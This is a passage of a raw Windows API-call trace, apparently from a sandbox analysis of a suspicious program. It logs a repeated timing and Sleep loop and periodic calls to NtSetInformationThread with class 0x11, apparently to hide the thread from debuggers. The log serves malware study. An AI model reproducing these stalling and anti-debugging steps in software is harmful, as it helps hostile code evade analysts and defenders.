(dwMilliseconds=0x3e8) [0183.287] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0x74)) [0183.287] GetTickCount () returned 0x1d39bf9 [0183.287] Sleep (dwMilliseconds=0x3e8) [0183.376] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0xc2)) [0183.376] GetTickCount () returned 0x1d3a02e [0183.376] Sleep (dwMilliseconds=0x3e8) [0183.505] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0x14e)) [0183.505] GetTickCount () returned 0x1d3a4a2 [0183.506] Sleep (dwMilliseconds=0x3e8) [0183.893] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0x2d4)) [0183.894] GetTickCount () returned 0x1d3aa0f [0183.894] Sleep (dwMilliseconds=0x3e8) [0184.143] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0x3ce)) [0184.144] GetTickCount () returned 0x1d3aeef [0184.144] Sleep (dwMilliseconds=0x3e8) [0184.347] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0xb0)) [0184.347] GetTickCount () returned 0x1d3b3a1 [0184.347] Sleep (dwMilliseconds=0x3e8) [0184.411] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0xef)) [0184.411] GetTickCount () returned 0x1d3b7c6 [0184.411] Sleep (dwMilliseconds=0x3e8) [0184.455] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x11e)) [0184.455] GetTickCount () returned 0x1d3bbdc [0184.455] Sleep (dwMilliseconds=0x3e8) [0184.504] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x14c)) [0184.504] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0184.504] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0184.505] GetCurrentThread () returned 0xfffffffe [0184.505] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0184.505] GetTickCount () returned 0x1d3bff2 [0184.505] Sleep (dwMilliseconds=0x3e8) [0184.582] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x19a)) [0184.582] GetTickCount () returned 0x1d3c427 [0184.582] Sleep (dwMilliseconds=0x3e8) [0184.690] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x208)) [0184.690] GetTickCount () returned 0x1d3c87b [0184.690] Sleep (dwMilliseconds=0x3e8) [0184.737] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x236)) [0184.737] GetTickCount () returned 0x1d3cc91 [0184.737] Sleep (dwMilliseconds=0x3e8) [0184.784] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x265)) [0184.784] GetTickCount () returned 0x1d3d0a7 [0184.784] Sleep (dwMilliseconds=0x3e8) [0184.846] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x2a4)) [0184.846] GetTickCount () returned 0x1d3d4cc [0184.846] Sleep (dwMilliseconds=0x3e8) [0184.908] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x2e2)) [0184.908] GetTickCount () returned 0x1d3d8f2 [0184.908] Sleep (dwMilliseconds=0x3e8) [0184.958] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x311)) [0184.958] GetTickCount () returned 0x1d3dd07 [0184.958] Sleep (dwMilliseconds=0x3e8) [0185.001] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x340)) [0185.002] GetTickCount () returned 0x1d3e11d [0185.002] Sleep (dwMilliseconds=0x3e8) [0185.049] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x36e)) [0185.049] GetTickCount () returned 0x1d3e533 [0185.049] Sleep (dwMilliseconds=0x3e8) [0185.142] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0x3cc)) [0185.142] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0185.143] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0185.143] GetCurrentThread () returned 0xfffffffe [0185.143] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0185.143] GetTickCount () returned 0x1d3e978 [0185.143] Sleep (dwMilliseconds=0x3e8) [0185.189] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x13)) [0185.189] GetTickCount () returned 0x1d3ed8d [0185.189] Sleep (dwMilliseconds=0x3e8) [0185.235] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x42)) [0185.235] GetTickCount () returned 0x1d3f1a3 [0185.235] Sleep (dwMilliseconds=0x3e8) [0185.283] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x70)) [0185.283] GetTickCount () returned 0x1d3f5b9 [0185.283] Sleep (dwMilliseconds=0x3e8) [0185.329] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x9f)) [0185.329] GetTickCount () returned 0x1d3f9cf [0185.329] Sleep (dwMilliseconds=0x3e8) [0185.376] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0xce)) [0185.376] GetTickCount () returned 0x1d3fde5 [0185.376] Sleep (dwMilliseconds=0x3e8) [0185.422] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0xfd)) [0185.423] GetTickCount () returned 0x1d401fa [0185.423] Sleep (dwMilliseconds=0x3e8) [0185.485] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x13b)) [0185.485] GetTickCount () returned 0x1d40620 [0185.485] Sleep (dwMilliseconds=0x3e8) [0185.533] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x16a)) [0185.533] GetTickCount () returned 0x1d40a36 [0185.533] Sleep (dwMilliseconds=0x3e8) [0185.578] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x199)) [0185.578] GetTickCount () returned 0x1d40e4b [0185.578] Sleep (dwMilliseconds=0x3e8) [0185.626] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x1c8)) [0185.627] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0185.627] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0185.627] GetCurrentThread () returned 0xfffffffe [0185.627] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0185.628] GetTickCount () returned 0x1d41261 [0185.628] Sleep (dwMilliseconds=0x3e8) [0185.675] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x1f6)) [0185.675] GetTickCount () returned 0x1d41677 [0185.675] Sleep (dwMilliseconds=0x3e8) [0185.719] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x225)) [0185.719] GetTickCount () returned 0x1d41a8d [0185.719] Sleep (dwMilliseconds=0x3e8) [0185.765] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x254)) [0185.766] GetTickCount () returned 0x1d41ea3 [0185.766] Sleep (dwMilliseconds=0x3e8) [0185.816] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x283)) [0185.816] GetTickCount () returned 0x1d422b8 [0185.816] Sleep (dwMilliseconds=0x3e8) [0185.868] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x2b2)) [0185.868] GetTickCount () returned 0x1d426ce [0185.868] Sleep (dwMilliseconds=0x3e8) [0185.908] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x2e0)) [0185.908] GetTickCount () returned 0x1d42ae4 [0185.908] Sleep (dwMilliseconds=0x3e8) [0185.945] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0x300)) [0185.945] GetTickCount () returned 0x1d42eea [0185.945] Sleep (dwMilliseconds=0x3e8) [0186.172] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x2)) [0186.172] GetTickCount () returned 0x1d433bb [0186.172] Sleep (dwMilliseconds=0x3e8) [0186.315] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x8e)) [0186.315] GetTickCount () returned 0x1d4382f [0186.315] Sleep (dwMilliseconds=0x3e8) [0186.432] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0xfb)) [0186.433] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0186.433] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0186.433] GetCurrentThread () returned 0xfffffffe [0186.433] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0186.433] GetTickCount () returned 0x1d43c83 [0186.433] Sleep (dwMilliseconds=0x3e8) [0186.472] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x12a)) [0186.472] GetTickCount () returned 0x1d44099 [0186.472] Sleep (dwMilliseconds=0x3e8) [0186.577] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x197)) [0186.577] GetTickCount () returned 0x1d444ed [0186.577] Sleep (dwMilliseconds=0x3e8) [0186.720] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x224)) [0186.720] GetTickCount () returned 0x1d44960 [0186.720] Sleep (dwMilliseconds=0x3e8) [0186.813] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x281)) [0186.813] GetTickCount () returned 0x1d44da5 [0186.813] Sleep (dwMilliseconds=0x3e8) [0186.859] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x2b0)) [0186.859] GetTickCount () returned 0x1d451bb [0186.859] Sleep (dwMilliseconds=0x3e8) [0186.952] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x30e)) [0186.952] GetTickCount () returned 0x1d455ff [0186.952] Sleep (dwMilliseconds=0x3e8) [0187.045] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0x36b)) [0187.045] GetTickCount () returned 0x1d45a44 [0187.045] Sleep (dwMilliseconds=0x3e8) [0187.170] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x0)) [0187.170] GetTickCount () returned 0x1d45ea8 [0187.170] Sleep (dwMilliseconds=0x3e8) [0187.263] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x5e)) [0187.263] GetTickCount () returned 0x1d462ec [0187.263] Sleep (dwMilliseconds=0x3e8) [0187.313] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x8c)) [0187.313] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0187.314] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0187.314] GetCurrentThread () returned 0xfffffffe [0187.314] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0187.314] GetTickCount () returned 0x1d46702 [0187.314] Sleep (dwMilliseconds=0x3e8) [0187.388] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0xda)) [0187.388] GetTickCount () returned 0x1d46b37 [0187.388] Sleep (dwMilliseconds=0x3e8) [0187.431] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0xfa)) [0187.431] GetTickCount () returned 0x1d46f3d [0187.431] Sleep (dwMilliseconds=0x3e8) [0187.473] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x128)) [0187.473] GetTickCount () returned 0x1d47353 [0187.473] Sleep (dwMilliseconds=0x3e8) [0187.561] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x186)) [0187.561] GetTickCount () returned 0x1d47798 [0187.561] Sleep (dwMilliseconds=0x3e8) [0187.655] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x1e4)) [0187.655] GetTickCount () returned 0x1d47bdc [0187.655] Sleep (dwMilliseconds=0x3e8) [0187.778] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x260)) [0187.778] GetTickCount () returned 0x1d48040 [0187.778] Sleep (dwMilliseconds=0x3e8) [0187.887] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x2ce)) [0187.887] GetTickCount () returned 0x1d48494 [0187.887] Sleep (dwMilliseconds=0x3e8) [0188.017] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x34a)) [0188.017] GetTickCount () returned 0x1d488f8 [0188.017] Sleep (dwMilliseconds=0x3e8) [0188.121] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x3b8)) [0188.122] GetTickCount () returned 0x1d48d4c [0188.122] Sleep (dwMilliseconds=0x3e8) [0188.230] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x3d)) [0188.231] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0188.231] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0188.231] GetCurrentThread () returned 0xfffffffe [0188.231] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0188.232] GetTickCount () returned 0x1d491a0 [0188.232] Sleep (dwMilliseconds=0x3e8) [0188.364] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0xba)) [0188.364] GetTickCount () returned 0x1d49604 [0188.364] Sleep (dwMilliseconds=0x3e8) [0188.558] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x184)) [0188.558] GetTickCount () returned 0x1d49ab6 [0188.558] Sleep (dwMilliseconds=0x3e8) [0188.698] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x211)) [0188.698] GetTickCount () returned 0x1d49f29 [0188.699] Sleep (dwMilliseconds=0x3e8) [0188.839] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x29d)) [0188.839] GetTickCount () returned 0x1d4a39d [0188.839] Sleep (dwMilliseconds=0x3e8) [0189.042] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x368)) [0189.042] GetTickCount () returned 0x1d4a84f [0189.042] Sleep (dwMilliseconds=0x3e8) [0189.153] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x3d5)) [0189.153] GetTickCount () returned 0x1d4aca3 [0189.153] Sleep (dwMilliseconds=0x3e8) [0189.244] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x4b)) [0189.244] GetTickCount () returned 0x1d4b0e7 [0189.244] Sleep (dwMilliseconds=0x3e8) [0189.338] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0xa8)) [0189.338] GetTickCount () returned 0x1d4b52c [0189.338] Sleep (dwMilliseconds=0x3e8) [0189.431] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x106)) [0189.431] GetTickCount () returned 0x1d4b971 [0189.432] Sleep (dwMilliseconds=0x3e8) [0189.526] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x164)) [0189.527] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0189.527] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0189.527] GetCurrentThread () returned 0xfffffffe [0189.527] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0189.528] GetTickCount () returned 0x1d4bdb5 [0189.528] Sleep (dwMilliseconds=0x3e8) [0189.619] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x1c1)) [0189.619] GetTickCount () returned 0x1d4c1fa [0189.619] Sleep (dwMilliseconds=0x3e8) [0189.711] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x20f)) [0189.711] GetTickCount () returned 0x1d4c62f [0189.837] Sleep (dwMilliseconds=0x3e8) [0189.959] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x309)) [0189.959] GetTickCount () returned 0x1d4cb0f [0189.960] Sleep (dwMilliseconds=0x3e8) [0190.040] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x366)) [0190.040] 